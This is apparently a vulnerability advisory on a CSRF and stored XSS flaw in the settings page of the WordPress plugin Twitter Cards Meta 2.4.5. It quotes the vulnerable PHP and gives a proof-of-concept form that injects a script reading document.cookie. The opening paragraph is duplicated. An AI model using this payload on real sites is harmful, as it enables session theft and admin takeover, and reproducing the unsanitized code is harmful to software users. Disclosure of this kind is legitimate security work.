We recently found that the Twitter Cards Meta contains a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the plugin’s setting pages,/wp-admin/admin.php?page=twitter-cards-meta. The CSRF potion of the vulnerability was due to a lack of a nonce on the page and a lack of a check for a valid one when processing a request to change the plugin’s settings. For the XSS issue, in the file /twcm-options.php starting at line 28 in version 2.4.5 settings are saved and there is no sanitization done: if(isset($_POST['save_options'])) { $options=array( 'site_twitter_username'=>trim($_POST['site_twitter_username']), 'use_authors_twitter_account'=>isset($_POST['use_authors_twitter_account']) ? intval($_POST['use_authors_twitter_account']) : '', 'use_image_from'=>$_POST['use_image_from'], 'image_custom_field'=>trim($_POST['image_custom_field']), 'default_image'=>(trim($_POST['default_image'])=='Link to Default Image')? '' : trim($_POST['default_image']),...
We recently found that the Twitter Cards Meta contains a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the plugin’s setting pages,/wp-admin/admin.php?page=twitter-cards-meta. The CSRF potion of the vulnerability was due to a lack of a nonce on the page and a lack of a check for a valid one when processing a request to change the plugin’s settings. For the XSS issue, in the file /twcm-options.php starting at line 28 in version 2.4.5 settings are saved and there is no sanitization done: if(isset($_POST['save_options'])) { $options=array( 'site_twitter_username'=>trim($_POST['site_twitter_username']), 'use_authors_twitter_account'=>isset($_POST['use_authors_twitter_account']) ? intval($_POST['use_authors_twitter_account']) : '', 'use_image_from'=>$_POST['use_image_from'], 'image_custom_field'=>trim($_POST['image_custom_field']), 'default_image'=>(trim($_POST['default_image'])=='Link to Default Image')? '' : trim($_POST['default_image']), 'home_page_description'=>(trim($_POST['home_page_description'])=='Enter a description for home page, keep it under 200 characters')? '' : wp_filter_nohtml_kses(trim($_POST['home_page_description'])), #wp_filter_nohtml_kses is smililar with strip_tags() function 'default_card_type'=>$_POST['default_card_type'], 'use_default_card_type_sitewide'=>isset($_POST['use_default_card_type_sitewide']) ? $_POST['use_default_card_type_sitewide'] : '' ); When the values are outputted on the page through the same file they were not escaped. For example, the value for “site_twitter_username” was set on line 68: <tr><td align="left" width="200">Site's Main Twitter Account:</td><td>@<input type="text" name="site_twitter_username" value="<?php echo ($twcm_options['site_twitter_username'])? $twcm_options['site_twitter_username'] :'WPDevTeam';?>" size="20" onblur="javascript: if(this.value=='') {this.value='WPDevTeam';}" onclick="javascript: if(this.value=='WPDevTeam') {this.value='';}" /></td></tr> ## Proof of Concept ## The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=twitter-cards-meta, when submitted as an Administrator. Make sure to replace “[path to WordPress]” with the location of WordPress. <html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=twitter-cards-meta" method="POST"> <input type="hidden" name="save_options" value="Save Options" /> <input type="hidden" name="site_twitter_username" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Submit" /> </form> </body> </html>
